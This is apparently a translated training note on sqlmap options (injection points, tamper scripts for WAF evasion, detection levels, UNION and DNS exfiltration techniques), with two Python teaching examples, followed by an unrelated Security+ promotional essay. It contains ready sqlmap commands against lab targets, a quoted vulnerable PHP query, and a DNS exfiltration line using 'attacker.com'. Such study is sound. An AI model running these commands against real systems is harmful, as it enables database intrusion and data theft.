SQLMAP Automatic injection-----Injection
-p
Specify the parameters to test; this overrides the --level based parameter selection
-p "user-agent,referer"
--skip
Exclude the specified parameters from testing
--level=5 --skip="id,user-agent"
URI injection point (mark the injection point in the path with *)
sqlmap -u "http://targeturl/param1/value1*/param2/value2/"
sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --dbs
--dbms
MySQL <5.0>
Oracle <11i>
Microsoft SQL Server <2005>
PostgreSQL
Microsoft Access
SQLite
Firebird
Sybase
SAP MaxDB
--dbs
--os
Linux
Windows
--invalid-bignum / --invalid-logical
By default sqlmap invalidates a parameter value by negating it: id=13 -> id=-13
--invalid-bignum invalidates the value with a large number instead: id=99999999
--invalid-logical invalidates it with a boolean expression: id=13 AND 18=19
--no-cast
When extracting data, sqlmap casts every result to a string and replaces NULL results with a blank space
Old MySQL databases need this switch turned on
--no-escape
For obfuscation and to avoid quoting errors, whenever a payload needs a single-quoted string sqlmap
replaces the string with CHAR() encoding:
SELECT 'foo' -> SELECT CHAR(102)+CHAR(111)+CHAR(111)
This switch turns that replacement off
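As an added example (not sqlmap's own code), the CHAR() string escaping described above, together with a decoder that turns such chains back into readable literals when reviewing logged queries; the function names and the sample query are mine.

```python
import re

# Added example, not code from sqlmap: emulate the CHAR() escaping that sqlmap
# applies unless --no-escape is given, and reverse it for log review.

def char_escape(s: str, dbms: str = "mssql") -> str:
    """Replace a string literal with CHAR() codes.
    MSSQL/Sybase concatenate single CHAR(n) calls with '+';
    MySQL accepts one CHAR(a,b,c) call."""
    codes = [ord(c) for c in s]
    if dbms == "mysql":
        return "CHAR(" + ",".join(str(c) for c in codes) + ")"
    return "+".join(f"CHAR({c})" for c in codes)

# One CHAR(...) call with one or more numeric arguments.
_CH = r"CHAR\(\s*\d+(?:\s*,\s*\d+)*\s*\)"
# A chain of CHAR() calls joined by '+' (MSSQL) or '||' (Oracle/PostgreSQL).
_CHAIN = re.compile(_CH + r"(?:\s*(?:\+|\|\|)\s*" + _CH + r")*", re.I)
_NUM = re.compile(r"\d+")

def char_decode(sql: str) -> str:
    """Replace every CHAR() chain in sql with the quoted string it encodes,
    so a logged query reads as the attacker meant it."""
    def repl(m: re.Match) -> str:
        text = "".join(chr(int(n)) for n in _NUM.findall(m.group(0)))
        return "'" + text + "'"
    return _CHAIN.sub(repl, sql)

def looks_char_encoded(sql: str, min_codes: int = 3) -> bool:
    """Detection heuristic: a literal assembled from min_codes or more CHAR()
    codes is unusual in application SQL and worth flagging in query logs."""
    return any(len(_NUM.findall(m.group(0))) >= min_codes
               for m in _CHAIN.finditer(sql))

if __name__ == "__main__":
    # Constructed sample of a logged query.
    logged = "SELECT * FROM users WHERE name=CHAR(102)+CHAR(111)+CHAR(111)"
    print(char_escape("foo"))
    print(char_decode(logged), looks_char_encoded(logged))
```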
--prefix/--suffix
Vulnerable PHP query (the injection point sits inside quotes and parentheses):
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0,1";
sqlmap -u "http://192.168.136.1.121/sqlmap/sysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
Resulting query (the closing parenthesis comes from the original statement, so the suffix must not add one):
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0,1";
--tamper
Obfuscation scripts for bypassing application-layer filtering, IPS and WAF
sqlmap -u "http://1.1.1.1/a.php?id=1" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3
List the tamper scripts shipped with the package:
dpkg -L sqlmap | grep tamper
sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" --dbs
SQLMAP Automatic Injection-----DETECTION
--level
Level 1-5 (default 1); the payloads are defined in
/usr/share/sqlmap/xml/payloads
--risk
1-4 (default 1, harmless)
Higher risk adds payloads that may tamper with data (e.g. UPDATE)
--string, --not-string, --regexp, --code, --text-only, --titles
Page comparison for boolean-based injection detection: true/false logic is decided from the change in the returned page content. Some pages, however, change with time (beyond the comparison threshold), so you may need to specify a string that identifies the true and false pages.
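An added example (not sqlmap's own code) of the page-comparison idea behind boolean-based detection: a raw comparison of two responses is fooled by a time stamp that changes on every request, while a marker string (--string) or pattern (--regexp) gives a stable decision. The sample responses and function names are constructed for this example.

```python
import difflib
import re

# Added example, not code from sqlmap. Constructed responses: the real
# difference between the true and false page is whether the account row is
# rendered; the server time changes on every request.
TRUE_PAGE = "<p>Time: 12:00:01</p><table><tr><td>admin</td></tr></table>"
TRUE_PAGE_AGAIN = "<p>Time: 12:00:07</p><table><tr><td>admin</td></tr></table>"
FALSE_PAGE = "<p>Time: 12:00:03</p><p>No account found</p>"

def similarity(a: str, b: str) -> float:
    """Ratio in [0, 1] between two responses; difflib stands in for the
    threshold-based comparison sqlmap uses by default."""
    return difflib.SequenceMatcher(None, a, b).ratio()

def same_page_exact(a: str, b: str) -> bool:
    """Byte-exact comparison: two 'true' responses look different because of
    the time stamp, so this rule alone gives wrong true/false answers."""
    return a == b

def strip_volatile(page: str) -> str:
    """Roughly what --text-only aims at: drop markup, then drop hh:mm:ss
    stamps, so the volatile part no longer affects the comparison."""
    text = re.sub(r"<[^>]+>", " ", page)
    text = re.sub(r"\b\d{2}:\d{2}:\d{2}\b", "", text)
    return " ".join(text.split())

def is_true_page(page: str, marker: str) -> bool:
    """--string: decide true/false by a marker only the true page contains."""
    return marker in page

def is_true_page_regexp(page: str, pattern: str) -> bool:
    """--regexp: the same decision with a regular expression."""
    return re.search(pattern, page) is not None

def classify(pages, marker: str):
    """Label each response True/False with the marker rule."""
    return [is_true_page(p, marker) for p in pages]

if __name__ == "__main__":
    print(same_page_exact(TRUE_PAGE, TRUE_PAGE_AGAIN))   # exact match fails
    print(strip_volatile(TRUE_PAGE) == strip_volatile(TRUE_PAGE_AGAIN))
    print(classify([TRUE_PAGE, FALSE_PAGE, TRUE_PAGE_AGAIN], "<td>admin</td>"))
```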
cd /usr/share/sqlmap/xml/payloads
ls
01_boolean_blind.xml 02_error_based.xml 03_inline_query.xml 04_stacked_queries.xml
05_time_blind.xml 06_union_query.xml
SQLMAP Automatic Injection-----TECHNIQUES
--technique (all techniques are used by default)
B: boolean-based blind
E: error-based
U: UNION query-based
S: stacked queries (required for file system, operating system and registry access)
T: time-based blind
--time-sec
Response delay, in seconds, used for time-based injection detection
--union-cols
UNION query tests 1-10 columns by default, up to 50 columns as --level increases
--union-cols 6-9
--union-char
UNION queries use NULL by default; in rare cases NULL fails and a numeric value can be specified manually
--union-char 123
--dns-domain
A DNS server controlled by the attacker can be used to speed up data extraction (DNS exfiltration)
--dns-domain attacker.com
--second-order
The result of an injection on one page is reflected on another page
--second-order http://1.1.1.1/b.php
SQLMAP Automatic Injection-----FINGERPRINT
-f, --fingerprint, -b, --banner
Database management system fingerprint information:
DBMS, operating system, architecture, patch level
These are student notes from a Safe Cattle class; to see this course or other information security material, go to the Safe Cattle classes.
Why is Security+ certification the most popular certification of the Internet+ era?
First, an introduction to Security+.
Security+ is a vendor-neutral third-party certification issued by the Computing Technology Industry Association (CompTIA) of the United States. Together with CISSP and ITIL it is listed among the ten most popular certifications in the international IT industry, and compared with CISSP, Security+ places more emphasis on information security technology and operations than on information security management.
The certification demonstrates ability in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is demanding and the credential carries weight, it has been widely adopted by enterprises and security professionals worldwide.
Why is Security+ certification so popular?
Reason one: among information security certifications, those emphasizing information security technology are lacking, and Security+ fills that gap.
The information security certifications currently recognized in the industry are mainly CISP and CISSP, but both emphasize information security management, and their technical content is broad and shallow. CISSP requires more than 5 years of information security work experience for the certificate, and CISP requires a college degree plus 4 years of work experience. These requirements block the path of capable and motivated young people. In practice, whether for job hunting, a raise, or staff listed in a tender, certification is essential, which is unfair to young people. Security+ clears these obstacles to career development: because it emphasizes information security technology, it has no special work-experience requirement. Anyone with an IT-related background who wants to advance can study for it and take the exam.
Reason two: a weapon for IT operations and maintenance staff, both for their work and for a career change.
In the banking, securities, insurance, and information and communications industries there are very many IT operations staff, and their work is very broad: an integrated technical post covering network, system, security, application architecture and storage. Operations staff may not share the programmer's tragic pathos of "born a coder, die writing code", but they know the feeling of toiling in the fields all day. Facing computers and machines every day, they inevitably feel confused about career development. The arrival of the international Security+ certification lets operations staff who seek progress learn network security knowledge and master network security practice, develop their careers in the direction of network security, and help relieve the shortage of information security personnel in China. Besides, even without a career change, learning security knowledge and obtaining a security certification is essential to doing operations and maintenance well.
Reason three: down to earth, international, easy to take, moderate cost!
As the most influential organization in the global ICT sector, CompTIA is professional, fair and impartial in certifying information security talent. Security+ is highly hands-on and closely tied to the daily work of frontline engineers, making it suitable for IT staff at banks, securities firms, insurers, internet companies and elsewhere. As an international certification it is widely recognized in 147 countries around the world.
Under the current wave of information security, talent is the key to the industry's development, and domestic information security personnel are very scarce. I believe Security+ will become the most popular information security certification.
"Safe Cow Learning Note" sqlmap automatic injection - Injection, Detection, Techniques